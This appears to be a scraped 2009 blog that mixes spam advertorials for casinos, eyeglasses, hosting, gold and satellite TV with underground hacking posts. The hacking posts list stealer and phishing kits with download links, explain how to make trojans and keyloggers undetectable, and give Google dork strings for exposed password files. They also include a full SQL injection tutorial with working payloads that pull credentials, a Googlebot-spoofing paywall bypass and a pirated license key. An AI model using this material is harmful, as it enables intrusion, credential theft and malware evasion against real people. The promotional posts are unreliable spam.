Are you want to play online casino? If so look no further then USAPlayersWelcome.com. USAPlayersWelcome.com is responsible and reliable gambling portal because it has support by credible administrator. They provide online casinos that accept USA players from all American states with no restrictions. USAPlayersWelcome.com offer big bonus, free casinos, language casinos. The online casinos accept all USA Players have been reviewed and tested to ensure they are reliable, and very safe. It also with other online casinos. You can trust USAPlayersWelcome.com to get the right online casinos. You will not disappointed by visiting USAPlayersWelcome.com. All online casinos here are reliable and easy process to be a member. So what are you waiting for? Visit USAPlayersWelcome.com and get your pleasure with all online casinos here.
Online Casinos Accepting All USA Players at USAPlayersWelcome.com
Posted at Wednesday, December 23, 2009Hacker Kit 2009 - Daily Hacker Tools [56mb]
Posted at Wednesday, December 09, 2009Hacker Kit 2009 - Daily Hacker Tools [56mb]
Some tools which hackers require in daily life. I personally use most of these.
Yahoo Account Locker
Acunetix Vulnerability Scanner + Crack
Admin Finder
Auto Surfer
Angry Ip Scanner
Anonymity Pack
Ardamax 28 and 2.9 + serial
Binders
Brutus
Crypters
Cookie Stealer
Debugging Tool
Email Bomber
Exploit Scanner
Ip Scanners
Irc Spammer
Md5 Cracker
Msn Freezer
MySqli Dumper
Passstealer - Istealer 5 and other fud stealers
Phishers - A to Z
Port Scanner
Shells Pack A to Z shells
Supernova 5
Telnet Tools
Xss scanner
zer0 server Attacker
Download:
http://depositfiles.com/en/files/yr3pwsuoa
Password:
The7thSage
Best Hacking Tools Collection 2010 *New*
Posted at Wednesday, December 09, 2009Best Hacking Tools Collection 2010 *New*
Best Hacking Tools 85 in 1 new 2010 | 22 Mb
The Best collection of Hacking tools available. Includes MSN and Yahoo hack tools.
Main page:
- HOTMAIL HACKING
- YAHOO HACKING
- MSN FUN TOOLS
- FAKE SCREENS/PAGES
- OTHER HACKING TOOLS
- FUN TOOLSPage 1:
MSN Chat Monitor And Sniffer
MSN Password Retriever
MSN Hacker DUC
Head **** HotMail HAck
HotMail Hacker XE Edition
HotMail HAck
HotMAil Hacker
MSN Passwords
MSN Flooder
MSN Sniffer
MSN SPY Lite
HotMail Hacker Gold
HotMail HAcker Final
Give me Ur Pass
HotMail Brute Forcer
MSN PAssword Finder
MSN Password Grabber
Hack MSN Password
Hack HotMAil Evolution
MAgic Password Sender
MSN Locker
HotMail Killer
Hot Freeze
MessenPass
HotMAil Hack !
Ice Cold Reload
HotMail Killer 2
Nuke MSNPage 2:
Yahoo Messenger Login Screen
MSN Messenger 7 Login Screen
MSN Messenger 5 Login Screen
MSN Messenger 4.6 Login Screen
HotMail Login Screen
Fake Web Pages 2
Fake Eeb Pages 1
AOL Killer
Fake Login HotMail
B-S Spy
Saria Fake LoginsPage 3:
Yahoo Password Retrieval
Yacam
Yahoo Cracker
Yahoo Booster
Yahoo Hack!
Yahoo Password Stealer
S-H Yahoo Password SenderPage 4:
NetWork Password Recovery
Net BIOS Name Scanner
FTP Password Hacker
Cable Modem Sniffer
Port Listening XP
Blue Port Scanner
www 2 IP
XP Killer
Sniff Password
Port Scanner
Fast Resolver
Domain Scan
Whois Domain
NetRes View
PHPbb Defacer
Angry IP Scanner
FTP Brute ForcerPage 5:
Hook Tool Box
Smart HAck UpLoader
Remote Anything
Post Sage
PHPbb AttackerPage 6:
Skinner
MSN Bomber Man
Ultimate Nick PopUpz
MSN 7 Universal Patcher
Emoticons Creator
MSN Picture Crawler
Anti Status Bomb
MSN Detector
Multi MSN Loader
Kitle
Protect Lithium
Tray It!
MSN Block Checker
MSN Auto Responder
MSN Virus CleanerDownload and Enjoy hacking....
DOWNLOAD Link:
http://hotfile.com/dl/16356901/e7b7bb8/Best_Hacking_Tools.rar.html
How to make ALL Trojan/Virus/Keylogger UNDETECTABLE
Posted at Wednesday, December 09, 2009How to make ALL Trojan/Virus/Keylogger UNDETECTABLE
This tutorial tells you how to make a Trojan, Virus, Keylogger, or anything that would be found harmful, NOT. This tutorial explains how to make all files look %100 clean (become clean and be %100 UNDETECTABLE from ALL ANTIVIRUSES!!!!! ALL!!!!!)Ready? GO! First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.
My personal favorite
keylogger: Ardamax Keylogger
Remote Administration Tool (Must not have a router): Poisin Ivy
Google is your friend.
Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!
1st Step:
Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:
CODE
http://nct.digitalriver.com/fulfill/0161.001
There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)
2nd Step:
Once you download the program, install it.
3rd Step:
Once installed, you open it up
Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!
ok now Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.
DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
CODE
http://rapidshare.com/files/8749860/projects.arm.html
Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).
Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!
Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.
Now, once its created, they are %100 undetectable.
Go to:
code:
virustotal.com or Novirusthanks.org
to scan it with every Antivirus, and they wont find ANYTHING!
Get full acces by "phpmyadmin"
Posted at Tuesday, November 17, 2009Get full acces by "phpmyadmin"
Why deface when you can own it?
Go to Google and type this:
intitle:PhpMyAdmin "Welcome to phpMyAdmin***" running on * as root@*"
This will give you tons of no passworded phpMyAdmin,means you'll have access to all files,can make changes ect.
======================================
To find websites Admin Password type the following in the Google bar:
inurl:vti_pvt "service.pwd"
(password will be encrypted) "convert encrypted password to md5 hash then use milw0rm
Also You can You use this codes when you have free time..enjoy
Google Search strings
-------------------------
Quote: * inurl:/db/main.mdb |ASP-Nuke passwords
* filetype:cfm "cfapplication |ColdFusion source with potential passwords name" password
* filetypeass |dbman credentials pass intext:userid
* allinurl:auth_user_file.txt |DCForum user passwords
* eggdrop filetype:user user |Eggdrop IRC user credentials
* filetype:ini inurl:flashFXP.ini |FlashFXP FTP credentials
* filetype:url +inurl:"ftp://" |FTP bookmarks cleartext passwords
+inurl:"@"
* inurl:zebra.conf intext: |GNU Zebra passwords
password -sample -test
-tutorial –download
* filetype:htpasswd htpasswd |HTTP htpasswd Web user credentials
* intitle:"Index of" ".htpasswd" |HTTP htpasswd Web user credentials
"htgroup" -intitle:"dist"
-apache -htpasswd.c
* intitle:"Index of" ".htpasswd" |HTTP htpasswd Web user credentials
htpasswd.bak
* "http://*:*@www" bob:bob |HTTP passwords (bob is a sample username)
* "sets mode: +k" |IRC channel keys (passwords)
* "Your password is * |Remember IRC NickServ registration passwords
this for later use"
* signin filetype:url |JavaScript authentication credentials
* LeapFTP intitle:"index.of./" |LeapFTP client login credentials
sites.ini modified
* inurl:lilo.conf filetype:conf |LILO passwords
password -tatercounter2000
-bootpwd –man
* filetype:config config intext: |Mcft .NET application credentials
appSettings "User ID"
* filetypewd service |Mcft FrontPage Service Web passwords
* intitle:index.of |Mcft FrontPage Web credentials
administrators.pwd
* "# -FrontPage-" |Mcft FrontPage Web passwords
inurl:service.pwd
extwd inurl:_vti_pvt inurl: |Mcft FrontPage Web passwords
(Service | authors | administrators)
* inurlerform filetype:ini |mIRC nickserv credentials
* intitle:"index of" intext: |mySQL database credentials
connect.inc
* intitle:"index of" intext: |mySQL database credentials
globals.inc
* filetype:conf oekakibbs |Oekakibss user passwords
* filetype:dat wand.dat |Opera‚ ÄúMagic Wand‚Äù Web credentials
* inurlspfd.conf intext: |OSPF Daemon Passwords
password -sample -test
-tutorial –download
* index.of passlist |Passlist user credentials
* inurlasslist.txt |passlist.txt file user credentials
* filetype:dat "password.dat" |password.dat files
* inurlassword.log filetype:log |password.log file reveals usernames,
|passwords,and hostnames
* filetype:log inurl:"password.log" |password.log files cleartext
|passwords
* inurleople.lst filetype:lst |People.lst generic password file
* intitle:index.of config.php |PHP Configuration File database
|credentials
* inurl:config.php dbuname dbpass |PHP Configuration File database
|credentials
* inurl:nuke filetype:sql |PHP-Nuke credentials
* filetype:conf inurlsybnc.conf |psyBNC IRC user credentials
"USER.PASS="
* filetype:ini ServUDaemon |servU FTP Daemon credentials
* filetype:conf slapd.conf |slapd configuration files root password
* inurl:"slapd.conf" intext: |slapd LDAP credentials
"credentials" -manpage
-"Manual Page" -man: -sample
* inurl:"slapd.conf" intext: |slapd LDAP root password
"rootpw" -manpage
-"Manual Page" -man: -sample
* filetype:sql "IDENTIFIED BY" –cvs |SQL passwords
* filetype:sql password |SQL passwords
* filetype:ini wcx_ftp |Total Commander FTP passwords
* filetype:netrc password |UNIX .netrc user credentials
* index.of.etc |UNIX /etc directories contain
|various credential files
* intitle:"Index of..etc" passwd |UNIX /etc/passwd user credentials
* intitle:index.of passwd |UNIX /etc/passwd user credentials
passwd.bak
* intitle:"Index of" pwd.db |UNIX /etc/pwd.db credentials
* intitle:Index.of etc shadow |UNIX /etc/shadow user credentials
* intitle:index.of master.passwd |UNIX master.passwd user credentials
* intitle:"Index of" spwd.db |UNIX spwd.db credentials
passwd -pam.conf
* filetype:bak inurl:"htaccess| |UNIX various password file backups
passwd|shadow|htusers
* filetype:inc dbconn |Various database credentials
* filetype:inc intext:mysql_ |Various database credentials, server names
connect
* filetyperoperties inurl:db |Various database credentials, server names
intextassword
* inurl:vtund.conf intextass –cvs |Virtual Tunnel Daemon passwords
* inurl:"wvdial.conf" intext: |wdial dialup user credentials
"password"
* filetype:mdb wwforum |Web Wiz Forums Web credentials
* "AutoCreate=TRUE password=*" |Website Access Analyzer user passwords
* filetypewl pwl |Windows Password List user credentials
* filetype:reg reg +intext: |Windows Registry Keys containing user
"defaultusername" intext: |credentials
"defaultpassword"
* filetype:reg reg +intext: |Windows Registry Keys containing user
"internet account manager" |credentials
* "index of/" "ws_ftp.ini" |WS_FTP FTP credentials
"parent directory"
* filetype:ini ws_ftp pwd |WS_FTP FTP user credentials
* inurl:admin filetype: |asp Generic userlist files
inurl:userlist |
* inurlhp inurl: |Half-life statistics file, lists username and
hlstats intext: |other information
Server Username |
* filetype:ctl |
inurl:haccess. |Mcft FrontPage equivalent of htaccess
ctl Basic |shows Web user credentials
* filetype:reg |
reg intext: |Mcft Internet Account Manager can
Secret Backdoor To Many Websites
Posted at Tuesday, November 17, 2009Secret Backdoor To Many Websites
Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....
The lesson you should have learned here is: Obviously Google can go where you can't.
Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.
In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.
How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.
CODE:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"
Voila! You're done!
You may always change it back again.... I know only one site that uses you User Agent to establish your eligability to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:
CODE:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Ps:
Opera allows for on-the-fly switching of User Agents through its "Browser Identification" function, while for Mozilla/FireFox browsers a switching utility is available as an installable extension
Full SQL Injection Tutorial (MySQL)
Posted at Tuesday, November 17, 2009Full SQL Injection Tutorial (MySQL)
In this tutorial i will describe how sql injection works and how to
use it to get some useful information.
First of all: What is SQL injection?
It’s one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc…(in shortly).
1.SQL Injection (classic or error based or whatever you call it)
2.Blind SQL Injection (the harder part)
So let’s start with some action
1). Check for vulnerability
Let’s say that we have some site like this
http://www.site.com/news.php?id=5
Now to test if is vulnerable we add to the end of url ‘ (quote),
and that would be http://www.site.com/news.php?id=5′
so if we get some error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar
that means is vulnerable to sql injection
2). Find the number of columns
To find number of columns we use statement ORDER BY (tells database how to order the result)
so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <– no error
http://www.site.com/news.php?id=5 order by 2/* <– no error
http://www.site.com/news.php?id=5 order by 3/* <– no error
http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this Unknown column ‘4′ in ‘order clause’ or something like that)
that means that the it has 3 columns, cause we got an error on 4.
3). Check for UNION function
With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works
4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try –
it’s a comment and it’s important for our query to work properly.
let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
if you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
i didn’t see any paper covering this problem, so i must write it
what we need is convert() function
i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version
5). Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s …
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…
i.e would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good :D)
we know that table admin exists…
now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc…
now to check if column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1…
now we must complete query to look nice
for that we can use concat() function (it joins strings)
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(username,0×3a,password),3 from admin/*
Note that i put 0×3a, its hex value for : (so 0×3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
when you have this, you can login like admin or some superuser
if can’t guess the right table name, you can always try mysql.user (default)
it has user i password columns, so example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,password),3 from mysql.user/*
6). MySQL 5
Like i said before i’m gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.
for third table we put limit 2,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc…
To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column is diplayed.
the second one (we change limit 0,1 to limit 1,1)
ie.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
the second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc…
if you wanna display column names for specific table use this query. (where clause)
let’s say that we found table users.
i.e
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*
now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won’t work if the magic quotes is ON.
let’s say that we found colums user, pass and email.
now to complete query to put them all together
for that we use concat() , i decribe it earlier.
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,pass,0×3a,email) from users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com
That’s all in this part, now we can proceed on harder part
2. Blind SQL Injection
Blind injection is a little more complicated the classic injection but it can be done
I must mention, there is very good blind sql injection tutorial by xprog, so it’s not bad to read it
Let’s start with advanced stuff.
I will be using our example
http://www.site.com/news.php?id=5
when we execute this, we see some page and articles on that page, pictures etc…
then when we want to test it for blind sql injection attack
http://www.site.com/news.php?id=5 and 1=1 <— this is always true
and the page loads normally, that’s ok.
now the real test
http://www.site.com/news.php?id=5 and 1=2 <— this is false
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.
1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don’t work then we use subselect
i.e
http://www.site.com/news.php?id=5 and (select 1)=1
if page loads normally then subselects work.
then we gonna see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one
let’s say that we have found that table name is users, now what we need is column name.
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter ‘c’.
then let’s check the second character.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),2,1))>99
Note that i’m changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0×3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is ‘i’. We have ‘ci’ so far
so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).
There are some tools for Blind SQL Injection, i think sqlmap is the best, but i’m doing everything manually,
cause that makes you better SQL INJECTOR
Hope you learned something from this paper.
Have FUN! (:
Roulette Casinoverdiener Strategy
Posted at Sunday, November 08, 2009Roulette is one of today’s most popular casino table games. It is easy to understand and learn and with the right strategy you would end up winning more than loosing. At first glance, the roulette table seems to be large and complicated, once you get to know the game, it is surprisingly easy. The game of roulette is surprisingly uncomplicated. All you have to do is place your bets, and wait for the spin. Of course, there is more to it then just throwing your money down anywhere, but even the most sophisticated bets in roulette are easy to do.
Playing online roulette and playing roulette at a real-life casino is very similar with the same kinds of bets and the same strategies for winning. The main difference is that in a real-life casino you’d be placing your bets with other people, running the risk of having your bets missed up with someone else’s if you don’t use a special colored chip at that table. You also have to ensure that your bets are all down on the roulette table before the dealer signals no more bets. When you’re playing online roulette, you just place your own bets and spin away.
The perfect roulette strategie is looked for, longed for, but still it remains illusive, this maybe due to roulette being one of the easiest games played in casinos, and winning streaks can and do happen at any time. But roulette is a game of chance and the definition speaks for itself, meaning that it can be very difficult to know when chance and Lady Luck will swing your way. That's why players do their best to find a perfect roulette strategy in order to optimize their betting style, to increase winnings and to minimize losses, whether they play roulette at casino or in an online casino.
Looking for online roulette strategy? If so, you can discover it at http://www.casinoverdiener.com/roulette.php. Here they give you the best roulette strategy section that will enlighten you to the world of online roulette. Take a little time to study their basic guide to understanding roulette betting strategy to keep one step ahead. Their casino roulette strategy overview page is an ideal resource to give you a head start in understanding this great game. They have a quick glance guide to all each one of their featured strategies for roulette.
Fun Holiday Eyeglasses from Zenni
Posted at Saturday, November 07, 2009Eyeglasses now has become part of people's lifestyles. This is proved by the many models and types of glasses are very diverse available in market. For holiday season now available wonderful selection of holiday fun eyeglasses from Zenni Optical. You can choose stylish eyeglass frames from Zenni Optical as a gift for this holiday season. If you're looking for high quality eyeglasses, great durability, safety and comfort check them out at ZenniOptical.com.
You can choose perfect style that fits your face. ZenniOptical.com is popular eyeglasses online store which sells high-quality and complete $8 prescription Zenni glasses. Can you believe that? Yes! that cheap. Zennioptical.com also has been announcing new arrivals of their stylish frames. So many option for you to buy your favorite eyeglasses that available at ZenniOptical.com.
Web Hosting Guide at WebHostingRating.com
Posted at Friday, November 06, 2009Many of our colleagues (web developers and web designers) are who crave a realiable web hosting. In general their demands are looking for a good web hosting service, reliable, and affordable price. In choosing a good web hosting, there are several basic requirements that must be met requirements such as good support service and always be contacted then good support hardware and network. Good support of hardware and network are important, because the chances of failure on your site will be very minimal.
Why do we have to choose web hosting that support services can always be contacted? This is very important because, for example, at one time you need help setting up something for your site, surely you contact that support service, although there are several things that can be done through customer service interface that is generally provided by the hosting provider. But would not it be fun if that answers your question is the human response?
The choice of a good network is appropriate to target your site visitors. If in general target audience is overseas, then use that website hosting has great network support overseas. If the target audience is people in the country so try to choose web hosting that you have the support network in the country.
How do you choose your ideal web hosting provider? Are there specific questions to ask when looking at different web hosting plans? What are the key elements to look at when evaluating a web hosting solution?
Discover all these questions in web hosting guide at WebHostingRating.com. They trying to build the biggest searchable web hosting directory featuring complete information on all web hosting providers, all their web hosting plans, promotional and discount coupons, and unedited reviews by real customers.
With WebHostingRating.com you can get complete information about web hosting and what you need as a guide to choosing the best web hosting and reliable. And at WebHostingRating.com also been certified and that award course will be trusted and the information provided in accordance with the truth.
WebHostingRating.com provides a list of the best web hosting services who would have certainly reliable and the service did not disappoint. In addition to providing a list of the best web hosting, web hosting review also gives the details of the web hosting. From the information about it we can choose what we think is the best web hosting that is suitable for our use. The information provided here is very complete and clear, so it is easy to compare them to choose the best web hosting we will use.
Buying Gold Bullion for Profitable Investment
Posted at Friday, November 06, 2009One alternative investment that can bring in profits is an investment in gold. Saving in the form of gold provide enough benefits, such as will not be affected by inflation. There are three types of gold used by the public for investment purposes such as gold jewelry, gold bullion and gold coins. Gold jewelry has been widely recognized by civil society. However, this gold can be reduced in value due to model that out of date. When the model is out of date, then the value will not be as high as actual prices. In addition, when you want to re-sale gold jewelry, it usually will be subjected for cut of manufacturing costs.
Unlike gold jewelry, gold bars and gold coins are different. Both are not influenced by the model and will not be charged at re-sale for the cost of production. Because the popularity of gold coin, as a gold investment service agency, Aurum Advisors try to offer a gold coin products that can be used by civil society to invest. Aurum Advisors are non-bank financial institutions whose existence and operations at corporate headquarters that located in Century City, California's financial district.
Buying gold bullion is now cheaper and easier than ever before. What makes it gold bullion is simply that its value derives entirely from its precious metal content. If you interesting on buying some bullion gold you might like to continue with purchase online at GoldCoinsGain.com. They have been serving the public for about a decade. They have all gold coins you receive guaranteed and authorized by a third party grading service. Gold bullion is right for any individual, family, or institution concerned with the very real threats facing the world today. Give gold a try. It sounds like it maybe right for you.
Order DIRECTV at TVbyDirect.com
Posted at Thursday, November 05, 2009If you want to watching television programming with High Definition (HD) Satellite TV then Direct TV is the right answer. Direct TV has over 100 channels available in HD including sports, entertainment and premium channels. With High Definition Satellite TV you will get amazing experience in watching television by crystal clear pictures, high quality sound and quick response time. DIRECT TV HD has the technology to bring the excitement of television programming right into your living room.
Are you've ever considered getting DIRECTV for business? If so DIRECTV will provide appropriate content for your customers. Direct TV Business offers a variety of packages so that your business will be able to provide entertainment, news, information, and sports to your customers and clients. With the affordable rates offered, your business will be able to satisfy your customers without going over budget.
DIRECTV's limited time offer grants you access to literally hundreds of channels with digital-quality picture and sound for a substantial discount when choosing from five of their programming packages. When signing up with DIRECTV as your satellite provider there are six programming packages to choose from. The six packages to choose from are: PREMIER™ Package, PLUS HD DVR™ package, PLUS DVR™ package, CHOICE XTRA™ Package, the CHOICE™ Package and the FAMILY™ package.
If you are football lover, there is DIRECTV NFL SUNDAY TICKET. NFL SUNDAY TICKET is an offer exclusive to DIRECTV and includes up to fourteen Sunday afternoon games during the regular season. If you not a sports fan, DIRECTV has all the programming a music fan could desire. You'll want VH1 and more of their premium music channels. You love having music channels but don't always have the time to watch your favorite musics? That's not a problem with DIRECTV DVR service. You can record your favorite musics to view at your convenience.
If you ready to get DIRECTV choose how you would like to order DIRECTV: You can call them at 1-866-579-6530, submit the request for them to call you back, or subscribe to DIRECTV service completely online at TVbyDirect.com.
Posted in DIRECTV, NFL, Satellite TV, Sports, Sunday Ticket, Television | 0 comments »
Usefull 2009 Hacking Tools & Tutorials
Posted at Wednesday, November 04, 2009Usefull 2009 Hacking Tools & Tutorials
info:
-----
All Parts Size is 5 MB
Hacking Tools
-------------
300 Emails Bomber
Active Perl
Carder Emailer
DosHttp
FireFox Stealer
Flooder
Gmail Hacker
JetSQL 2.0
MD5 Password Cracker
Msn Pass Stealer
Pangolin Professinal Edition
Pass Viewer
PrjSiteHack
CC Checker
Sms Bomber
SQL InjecTion & XSS TooLz
Wind Stealer
Xn Hashing Tool
Email Brute
CS Crypter
Phisher Maker
SQL Exploiter Pro v2.14
Hacking Tutorials
-----------------
Asp Sql Tutorial
Sql Injection Tutorial
CMS ORTUS Tutorial
Facebook flood
fake mail
megaupload trick
tips for rs download
vip carding
Other
150K Emal Leads
Shellz
Cookie Stealer Exploit
Adult 500K Emal Leads
Download Code:
http://rapidshare.com/files/299438173/Usefull_2009_Hacking_Tools___Tutorals.part01.rar
http://rapidshare.com/files/299440856/Usefull_2009_Hacking_Tools___Tutorals.part02.rar
http://rapidshare.com/files/299444307/Usefull_2009_Hacking_Tools___Tutorals.part03.rar
http://rapidshare.com/files/299457761/Usefull_2009_Hacking_Tools___Tutorals.part04.rar
http://rapidshare.com/files/299457762/Usefull_2009_Hacking_Tools___Tutorals.part05.rar
http://rapidshare.com/files/299457764/Usefull_2009_Hacking_Tools___Tutorals.part06.rar
http://rapidshare.com/files/299457765/Usefull_2009_Hacking_Tools___Tutorals.part07.rar
http://rapidshare.com/files/299457767/Usefull_2009_Hacking_Tools___Tutorals.part08.rar
http://rapidshare.com/files/299457768/Usefull_2009_Hacking_Tools___Tutorals.part09.rar
http://rapidshare.com/files/299457769/Usefull_2009_Hacking_Tools___Tutorals.part10.rar
http://rapidshare.com/files/299457770/Usefull_2009_Hacking_Tools___Tutorals.part11.rar
http://rapidshare.com/files/299457771/Usefull_2009_Hacking_Tools___Tutorals.part12.rar
IP HIDER 3.7 Full + License Key
Posted at Wednesday, November 04, 2009IP HIDER 3.7 Full + License Key
This license key is valid only for version 3.7 so please make sure that you have this version installed.Please follow these steps to register:
1. Make sure that you have the trial version of the software installed. In order to verify this please go to Start / All Programs / IP Hider. If the IP Hider is present that means that you have the software installed, otherwise please download and install the latest version of the application from http://www.allanonymity.com.
2. Considering that the software is installed there are two situations:
- The trial copy is expired. In this case after you start the application - you will be promoted to Buy, Uninstall or Register the software. Press Register and the registration form will start. Copy and paste the licensing information below and press OK.
- The trial copy is not expired. In this case the user interface will start normally and you should go to Register menu, the registration form will be displayed. Copy and paste the licensing information below and press Register.
3. Your license information is below. Copy and paste into the registration form only the bolded strings:
- email: ajobbalok@gmail.com" onclick="window.open(this.href);return false
